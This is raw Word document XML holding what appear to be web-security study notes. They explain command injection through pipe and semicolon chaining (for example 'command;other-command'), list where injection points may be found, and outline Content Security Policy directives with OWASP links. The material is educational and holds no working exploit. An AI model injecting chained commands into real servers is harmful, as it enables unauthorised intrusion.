          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The | command is used to pass output from one command to another and can also be used to execute commands on the server. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F96F3C1" w14:textId="77777777" w:rsidR="00737B45" w:rsidRDefault="00737B45" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="2160"/>
          <w:tab w:val="num" w:pos="3240"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="3240"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The ; character also works well. In most shells, it signifies that a command is complete. You can use this to chain commands so if the input is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">command. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Then you can provide </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>command;other-command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1234D0" w14:textId="77777777" w:rsidR="00737B45" w:rsidRDefault="00737B45" w:rsidP="00737B45">
      <w:pPr>
        <w:ind w:left="1080"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E80F997" w14:textId="77777777" w:rsidR="00737B45" w:rsidRDefault="00737B45" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Where Would You Find Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F3CA28" w14:textId="77777777" w:rsidR="00737B45" w:rsidRDefault="00737B45" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In the following places:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279F3221" w14:textId="77777777" w:rsidR="00737B45" w:rsidRDefault="00737B45" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1800"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1800"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Text boxes that take in input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2152EE69" w14:textId="77777777" w:rsidR="00737B45" w:rsidRDefault="00737B45" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1800"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1800"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hidden URLs that take input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0591047F" w14:textId="77777777" w:rsidR="00737B45" w:rsidRDefault="00737B45" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
          <w:tab w:val="num" w:pos="2520"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="2520"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>E.g. /execute/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>command-name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27662127" w14:textId="77777777" w:rsidR="00737B45" w:rsidRDefault="00737B45" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
          <w:tab w:val="num" w:pos="2520"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="2520"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Or through queries e.g. /location?parameter=command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1412A4AB" w14:textId="77777777" w:rsidR="00737B45" w:rsidRDefault="00737B45" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
          <w:tab w:val="num" w:pos="2520"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="2520"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>When using URLs, remember to URL encode the characters that aren’t accepted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A44033F" w14:textId="77777777" w:rsidR="00737B45" w:rsidRDefault="00737B45" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1800"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1800"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hidden ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4B9301" w14:textId="375E4A85" w:rsidR="00737B45" w:rsidRDefault="00737B45" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
          <w:tab w:val="num" w:pos="2520"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="2520"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Some frameworks open debug ports that take in arbitrary commands </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375DA5CF" w14:textId="09E5098F" w:rsidR="00801CC8" w:rsidRPr="00737B45" w:rsidRDefault="00801CC8" w:rsidP="00801CC8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>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14:anchorId="32AC5FE9" wp14:editId="5074E86F">
            <wp:extent cx="4259072" cy="2388235"/>
            <wp:effectExtent l="0" t="0" r="8255"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43">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4276828" cy="2398191"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2414D008" w14:textId="4A89AE87" w:rsidR="00E578E8" w:rsidRDefault="007A6E65" w:rsidP="00737B45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId144" w:history="1">
        <w:r w:rsidR="00737B45" w:rsidRPr="005B0C1A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.owasp.org/index.php/Command_Injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6740BCAF" w14:textId="03D74E9F" w:rsidR="00E578E8" w:rsidRDefault="00E578E8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Misc. and Logic Flaws</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EFDB10" w14:textId="5BB8D794" w:rsidR="00E578E8" w:rsidRDefault="00E578E8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Parameter Manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D331D22" w14:textId="09E3EA17" w:rsidR="00E578E8" w:rsidRDefault="00E578E8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Directory Traversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07983878" w14:textId="7F120AC2" w:rsidR="00E578E8" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId145" w:history="1">
        <w:r w:rsidR="00E578E8" w:rsidRPr="0037253A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.owasp.org/index.php/Path_Traversal</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0133B052" w14:textId="73CBD9BD" w:rsidR="00E578E8" w:rsidRDefault="00E578E8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Forceful Browsing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6D0BE9" w14:textId="0EC28D74" w:rsidR="00E578E8" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId146" w:history="1">
        <w:r w:rsidR="00E578E8" w:rsidRPr="0037253A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.owasp.org/index.php/Forced_browsing</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0A74C270" w14:textId="33699A16" w:rsidR="00E578E8" w:rsidRDefault="00E578E8" w:rsidP="00E578E8">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16D31F4D" w14:textId="09BEA304" w:rsidR="00E578E8" w:rsidRDefault="00095CFB" w:rsidP="00E578E8">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Content Security Policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFB8D82" w14:textId="11E0DE2B" w:rsidR="00095CFB" w:rsidRDefault="00095CFB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB7DBE1" w14:textId="54C046B8" w:rsidR="00034CCE" w:rsidRDefault="00546187" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00546187">
        <w:t>https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DDBB9D" w14:textId="223629E2" w:rsidR="00095CFB" w:rsidRDefault="00095CFB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>What is CSP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F18198" w14:textId="31641AE4" w:rsidR="00095CFB" w:rsidRDefault="00EF4D93" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Content Security Policy is typically sent via HTTP Response Header from webserver to browser when request a page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68686369" w14:textId="173C073C" w:rsidR="00EF4D93" w:rsidRDefault="00EF4D93" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>describes which sources of content the browser should allow to be loaded in and which are to be blocked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EE3DD8" w14:textId="0DBC657E" w:rsidR="00EF4D93" w:rsidRDefault="00EF4D93" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>designed to prevent XSS or data injection vulnerability until patched</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8E4CC5" w14:textId="0CC1BC54" w:rsidR="00EF4D93" w:rsidRDefault="00EF4D93" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>can be included in HTML source code with &lt;meta&gt; tag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F628E6C" w14:textId="18D49BFA" w:rsidR="00EF4D93" w:rsidRDefault="00EF4D93" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00EF4D93">
        <w:t>&lt;meta http-equiv="Content-Security-Policy" content="script-src 'none'; object-src 'none';"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F707C25" w14:textId="739D477C" w:rsidR="00EF4D93" w:rsidRDefault="00EF4D93" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>How can CSP be bypassed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CC54C8" w14:textId="12FF30B5" w:rsidR="00EF4D93" w:rsidRDefault="00EF4D93" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>read policy sent by server and look for flaws for exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FC591B" w14:textId="5EC06669" w:rsidR="00EF4D93" w:rsidRDefault="00EF4D93" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Directives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1625ACC1" w14:textId="64D9B56C" w:rsidR="00EF4D93" w:rsidRDefault="00EF4D93" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Common Directives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F11CDF9" w14:textId="1E4D8927" w:rsidR="00EF4D93" w:rsidRDefault="00EF4D93" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>default-src – if a resource is being loaded without a directive specified for it, it defers to default-src to verify if it is allowed to load</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F936F11" w14:textId="7F22EC28" w:rsidR="00EF4D93" w:rsidRDefault="00EF4D93" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>script-src – specifies the sources where from JS scripts can be loaded and executed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CABD0E" w14:textId="41FE0741" w:rsidR="00EF4D93" w:rsidRDefault="00EF4D93" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>connect-src – specifies which locations can JS code perform AJAX request (XMLHTTPRequest or fetch)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4969109E" w14:textId="637C6C69" w:rsidR="00EF4D93" w:rsidRDefault="00EF4D93" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">style-src / img-src / font-src / media-src </w:t>
      </w:r>
      <w:r w:rsidR="00A52344">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A52344">
        <w:t>specify from which locations CSS stylesheets, images, fonts, and media files can respectively be loaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3757DAFA" w14:textId="2A45AF19" w:rsidR="00A52344" w:rsidRDefault="00A52344" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>frame-src / child-src – defines which locations can be embedded on the webpage via iframes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5B19B7" w14:textId="32754C0D" w:rsidR="00A52344" w:rsidRDefault="00A52344" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>report-uri – special directive that will instruct the browser to report all violations of CSP via POST request to a particular URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F35C1F" w14:textId="002C7A22" w:rsidR="00A52344" w:rsidRDefault="00A52344" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>useful for trying to find code injection vulnerabilities or locations where CSP may break the functionality of website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45562D43" w14:textId="18BA4F0C" w:rsidR="00A52344" w:rsidRDefault="00A52344" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>deprecated and will be replaced by report-to directive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E773B87" w14:textId="7A3D34CA" w:rsidR="00A52344" w:rsidRDefault="00A52344" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Additional Directives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191F25D7" w14:textId="62CA057F" w:rsidR="00A52344" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId147" w:anchor="directive" w:history="1">
        <w:r w:rsidR="00A52344" w:rsidRPr="00342DAA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://content-security-policy.com/#directive</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
